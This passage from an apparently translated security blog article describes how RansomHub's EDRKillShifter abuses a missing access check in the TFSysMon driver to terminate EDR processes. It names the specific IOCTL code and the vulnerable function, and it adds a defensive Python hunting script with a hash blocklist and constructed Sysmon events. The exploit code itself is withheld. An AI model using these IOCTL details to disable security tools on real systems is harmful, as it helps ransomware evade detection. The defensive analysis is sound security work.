EDRKillShifter is the tool RansomHub uses to exploit this vulnerability. It takes advantage of the missing access check on the driver's function sub_1837C, which accepts an argument a1[3] without verifying whether the caller holds the permissions needed to terminate a process. In other words, a malicious actor can invoke the IOCTL code to improperly terminate an EDR process, bypassing the security measures.

RansomHub's use of EDRKillShifter is a significant threat. The ability to disable EDR systems lets attackers evade detection and carry out their malicious operations undiscovered. In a documented attack, RansomHub exploited this vulnerability to compromise several systems, successfully disabling 5 of the 7 EDR products tested.
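Because a BYOVD attacker brings the driver along, the useful checks on the defender's side are whether that driver file is present and whether it has ever been loaded. The script below is an added example, not code from Sophos or from the researcher: it hashes files against a blocklist seeded with the SHA256 given above, and runs the same blocklist plus a load-path and signature check over driver-load records. The records are constructed and flattened into one `key=value` line each (Sysmon Event ID 6 field names; the driver path `C:\Users\Public\tfsysmon.sys` and the timestamps are invented), so adapt the parser to the field names your SIEM emits.

```python
"""Hunt for the vulnerable TFSysMon driver: on disk by hash, and in driver-load events.

Added example for this page. The event lines are constructed (Sysmon Event ID 6
fields flattened to key=value) and the path of the planted driver is invented.
"""
import hashlib
import re

# SHA256 of the TFSysMon driver abused by EDRKillShifter, as published above.
BLOCKLIST = {
    "1c1a4ca2cbac9fe5954763a20aeb82da9b10d028824f42fff071503dcbe15856":
        "TFSysMon (ThreatFire System Monitor), abused by EDRKillShifter",
}
DRIVER_DIR = r"c:\windows\system32\drivers"  # legitimate drivers live here; loads from elsewhere stand out

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def sha256_file(path, chunk=1 << 20):
    """SHA256 of a file on disk, streamed so a large driver is not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_blocklisted_file(path):
    return sha256_file(path) in BLOCKLIST


def parse_event(line):
    """Turn one flattened 'Driver loaded' record into a dict; pulls SHA256 out of the Hashes field."""
    fields = {k: (q if q else bare) for k, q, bare in FIELD_RE.findall(line)}
    hashes = dict(h.split("=", 1) for h in fields.get("Hashes", "").split(",") if "=" in h)
    fields["SHA256"] = hashes.get("SHA256", "").lower()
    return fields


def assess(event):
    """Reasons a driver load deserves attention (an empty list means nothing seen)."""
    reasons = []
    if event["SHA256"] in BLOCKLIST:
        reasons.append("blocklisted vulnerable driver: " + BLOCKLIST[event["SHA256"]])
    image = event.get("ImageLoaded", "")
    if image and not image.lower().startswith(DRIVER_DIR):
        reasons.append("loaded from outside the drivers directory: " + image)
    if event.get("Signed", "").lower() != "true":
        reasons.append("not signed")
    return reasons


def hunt(lines):
    """Return {ImageLoaded: reasons} for every Event ID 6 record that trips a check."""
    findings = {}
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "6":
            continue
        reasons = assess(ev)
        if reasons:
            findings[ev["ImageLoaded"]] = reasons
    return findings


SAMPLE_EVENTS = [  # constructed; the all-zero hash is a placeholder, not the real hash of ndis.sys
    r'EventID=6 UtcTime="2024-08-14 10:22:31" ImageLoaded="C:\Windows\System32\drivers\ndis.sys" '
    r'Hashes="SHA256=0000000000000000000000000000000000000000000000000000000000000000" Signed=true SignatureStatus=Valid',
    # A validly signed driver is still bad when it is the known-vulnerable one; here it also sits in a user-writable directory
    r'EventID=6 UtcTime="2024-08-14 10:25:07" ImageLoaded="C:\Users\Public\tfsysmon.sys" '
    r'Hashes="SHA256=1C1A4CA2CBAC9FE5954763A20AEB82DA9B10D028824F42FFF071503DCBE15856" Signed=true SignatureStatus=Valid',
    r'EventID=1 UtcTime="2024-08-14 10:25:09" Image="C:\Users\Public\killer.exe" Hashes="SHA256=ffff"',  # process create, ignored
]

if __name__ == "__main__":
    for image, why in hunt(SAMPLE_EVENTS).items():
        print(image, "->", "; ".join(why))
```

Note that the signature check alone would pass the TFSysMon load: BYOVD works precisely because the driver carries a valid signature, so hash and path are the signals that carry weight. Extend `BLOCKLIST` with further drivers as they become known rather than relying on any single indicator.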

POC (Proof of Concept)


Following the discovery of the vulnerability in the TFSysMon driver, a Proof of Concept (POC) was developed to demonstrate the feasibility and impact of the exploit. The POC was built to test the effectiveness of the attack against several EDR products. During tests carried out in May, three months before RansomHub started using the vulnerable driver, the POC successfully terminated five of the seven EDR products tested.

The POC uses the IOCTL call (0xB4A00404) which, as described, invokes the function sub_1837C without performing any permission checks. The missing access control lets the POC improperly terminate EDR processes, showing clearly how a malicious actor could exploit this vulnerability to disable a system's security defences.

For security reasons the Proof of Concept code has not been published. However, the experiment provided concrete evidence that this vulnerability is a serious threat to corporate security systems. The existence of tools such as EDRKillShifter, capable of exploiting such weaknesses, requires organizations to adopt effective preventive measures, such as regularly updating drivers and verifying the security of their infrastructure. Bear in mind that in a BYOVD attack the attacker brings the driver with them, so patching the drivers already installed is not enough on its own: preventing known-vulnerable drivers from loading (for example through Microsoft's vulnerable driver blocklist enforced with HVCI or WDAC) and monitoring driver-load events matter just as much.

The POC experiment also underlines the importance of continuous collaboration between security researchers and software vendors, to identify and fix vulnerabilities promptly before they can be exploited in real attacks.

The POC demonstrated not only the existence of the vulnerability in the TFSysMon driver but also how dangerous it is when used by malicious actors. This experiment reinforced the importance of a proactive approach to vulnerability management, including regular testing and timely updates. Sharing findings within the security community is crucial to preventing future attacks and protecting critical infrastructure from increasingly sophisticated threats.

Conclusions


The case of EDRKillShifter used by RansomHub is a disquieting reminder of the creativity and persistence of cybercriminals. Missing access controls in drivers can have devastating consequences, allowing malicious actors to compromise even the most advanced security systems. It is essential that organizations maintain a proactive approach to security, including continuous vulnerability assessment and prompt application of patches and updates to mitigate such risks.

Special thanks go to Alex Necula of ACS Data System S.p.A for carrying out the Proof of Concept that highlighted the critical vulnerability in the TFSysMon driver. His work made a fundamental contribution to understanding and mitigating this threat. Without his dedication and expertise it would have been harder for the security community to recognize and effectively address this potential attack vector.

His collaboration and commitment to cybersecurity are highly appreciated and are an example of how the work of a single researcher can have a significant impact on collective protection against cyber threats.

The article “RansomHub's Secret Weapon for disabling EDRs. The BYOVD PoC used by EDRKillShifter” comes from il blog della sicurezza informatica.
